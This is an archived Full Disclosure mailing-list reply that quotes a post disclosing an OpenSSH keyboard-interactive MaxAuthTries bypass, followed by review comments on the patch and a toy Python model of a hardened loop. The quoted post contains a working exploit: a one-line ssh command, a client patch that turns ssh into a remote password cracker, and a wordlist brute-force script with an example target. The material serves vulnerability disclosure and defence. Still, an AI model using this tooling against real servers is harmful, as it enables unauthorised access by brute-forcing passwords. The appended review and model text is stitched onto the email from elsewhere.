Message-ID: <55A9BA00.2020808@roosoft.ltd.uk>
Date: Sat, 18 Jul 2015 03:29:20 +0100
From: devel@...soft.ltd.uk
To: fulldisclosure@...lists.org
Subject: Re: [FD] OpenSSH keyboard-interactive authentication brute force vulnerability (MaxAuthTries bypass)

On 17/07/15 10:04, king cope wrote:
> OpenSSH has a default value of six authentication tries before it will
> close the connection (the ssh client allows only three password
> entries per default).
>
> With this vulnerability an attacker is able to request as many
> password prompts limited by the “login graced time” setting, that is
> set to two minutes by default.
>
> Especially FreeBSD systems are affected by the vulnerability because
> they have keyboard-interactive authentication enabled by default.
>
> A simple way to exploit the bug is to execute this command:
>
> ssh -lusername -oKbdInteractiveDevices=`perl -e 'print "pam," x
> 10000'` targethost
>
> This will effectively allow up to 10000 password entries limited by
> the login grace time setting.
>
> The crucial part is that if the attacker requests 10000
> keyboard-interactive devices openssh will gracefully execute the
> request and will be inside a loop to accept passwords until the
> specified devices are exceeded.
>
> Here is a patch for openssh-6.9p1 that will allow to use a wordlist
> and any passwords piped to the ssh process to be used in order to
> crack passwords remotely.
>
> ---snip---
>
> diff openssh-6.9p1/sshconnect2.c openssh-6.9p1-modified/sshconnect2.c
> 83a84,85
> > char password[1024];
> >
> 510c512,517
> < authctxt->success = 1; /* break out */
> ---
> > printf("==============================================\n");
> > printf("*** SUCCESS **********************************\n");
> > printf("*** PASSWORD: %s\n", password);
> > printf("==============================================\n");
> > exit(0);
> >
> 1376a1384,1385
> > char *devicebuffer;
> > int i;
> 1386a1396,1405
> > devicebuffer = calloc(1, 200000);
> > if (!devicebuffer) {
> > fatal("cannot allocate devicebuffer");
> > }
> >
> > for (i=0;i<200000-2;i+=2) {
> > memcpy(devicebuffer + i, "p,", 2);
> > }
> > devicebuffer[200000] = 0;
> >
> 1393,1394c1412
> < packet_put_cstring(options.kbd_interactive_devices ?
> < options.kbd_interactive_devices : "");
> ---
> > packet_put_cstring(devicebuffer);
> 1408c1426
> < char *name, *inst, *lang, *prompt, *response;
> ---
> > char *name, *inst, *lang, *prompt;
> 1410c1428
> < int echo = 0;
> ---
> > char *pos;
> 1425a1444
> >
> 1430a1450
> >
> 1443,1449c1463,1469
> < echo = packet_get_char();
> <
> < response = read_passphrase(prompt, echo ? RP_ECHO : 0);
> <
> < packet_put_cstring(response);
> < explicit_bzero(response, strlen(response));
> < free(response);
> ---
> > packet_get_char();
> > if (fgets(password, 1024, stdin) == NULL)
> > exit(0);
> > if ((pos=strchr(password, '\n')) != NULL)
> > *pos = '';
> > printf("%s\n", password);
> > packet_put_cstring(password);
>
> ---snip---
>
> After applying the patch you can use this shell script to make the
> password attack from a wordlist:
>
> ---snip---
>
> #!/bin/bash
> # run as:
> # cat wordlist.txt | ./sshcracker.sh ssh-username ssh-target
> #
> while true
> do
> ./ssh -l$1 $2
> rc=$?; if [[ $rc == 0 ]]; then exit $rc; fi
> echo Respawn due to login grace time...
> done
>
> ---snip---
>
> For example enter this command:
>
> cat wordlist.txt | ./sshcracker.sh test 192.168.2.173
>
> The attack has been tested against a new FreeBSD 10.1 system and older
> FreeBSD versions such as version 6.2.
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/

Do you know if this is still affected if you have fail2ban in place?
Fail2ban uses the auth logs to monitor failed password attempts. I assume
that the auth log is still updated even if x number of attempts is allowed.

Thanks

--
==
Don Alexander
It's a tough job, but some mug has to do it...
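Review bot: In the 1386a1396,1405 hunk, "devicebuffer[200000] = 0;" writes one byte past the end of the allocation; calloc(1, 200000) gives valid indices 0..199999. Since calloc already zero-fills and the loop's last memcpy ends at offset 199998, the terminator is already in place and that line should simply be dropped.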
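Review bot: In the 1443,1449c1463,1469 hunk, the replacement drops the explicit_bzero()/free() of the response, so every candidate read into the 1024-byte password buffer remains in process memory after it has been sent, and it is also echoed to stdout by the added printf(). The line "*pos = '';" is not valid C as shown (an empty character constant) and should be the NUL terminator; it looks like a transcription loss rather than intent.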
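The quoted post's central claim is that the server walks every requested keyboard-interactive device and only counts a failed request against MaxAuthTries once the whole list is exhausted. The following toy model in Python, added here and not code from the post or from OpenSSH, shows that multiplier next to one defensive check (consulting each device name at most once per request) that removes it; the device names, the grace-time ceiling and the always-wrong answers are constructed for illustration.

```python
# Added example, not OpenSSH code and not from the quoted post: a toy model of
# the server-side keyboard-interactive loop the post describes. Device names,
# limits and the always-wrong answers are constructed for illustration.

MAX_AUTH_TRIES = 6                   # sshd default named in the post
GRACE_PROMPT_CEILING = 10000         # stand-in for the LoginGraceTime cut-off
KNOWN_DEVICES = frozenset({"pam"})   # the only device this toy server offers


def parse_devices(requested):
    """Split the client-supplied KbdInteractiveDevices list on commas."""
    return [d for d in requested.split(",") if d]


def prompts_per_request(requested, once_per_device):
    """Prompts one userauth request yields when every answer is wrong.

    once_per_device=False walks the whole list and prompts for every entry
    naming a known device, so 10000 copies of "pam" mean 10000 prompts: the
    multiplier the post exploits. once_per_device=True consults each device
    name at most once per request, which removes the multiplier.
    """
    seen, prompts = set(), 0
    for dev in parse_devices(requested):
        if dev not in KNOWN_DEVICES or (once_per_device and dev in seen):
            continue
        seen.add(dev)
        prompts += 1
    return prompts


def prompts_per_connection(requested, once_per_device, max_tries=MAX_AUTH_TRIES):
    """Wrong-password prompts served before the server drops the connection.

    MaxAuthTries counts failed requests, and a request only fails once its
    device list is exhausted, so the total is prompts per request times
    max_tries, capped by the grace-time ceiling.
    """
    per_request = prompts_per_request(requested, once_per_device)
    total = 0
    for _ in range(max_tries):
        if per_request == 0 or total >= GRACE_PROMPT_CEILING:
            break
        total += per_request
    return min(total, GRACE_PROMPT_CEILING)


if __name__ == "__main__":
    flood = "pam," * 10000   # the device list built by the post's ssh command
    for label, devs in (("normal client", "pam"), ("10000 x pam", flood)):
        print(f"{label:14} vulnerable={prompts_per_connection(devs, False):6}"
              f"  hardened={prompts_per_connection(devs, True)}")
```

A normal client gets six prompts either way; the flooded device list gets 10000 prompts from the vulnerable loop and still six from the hardened one.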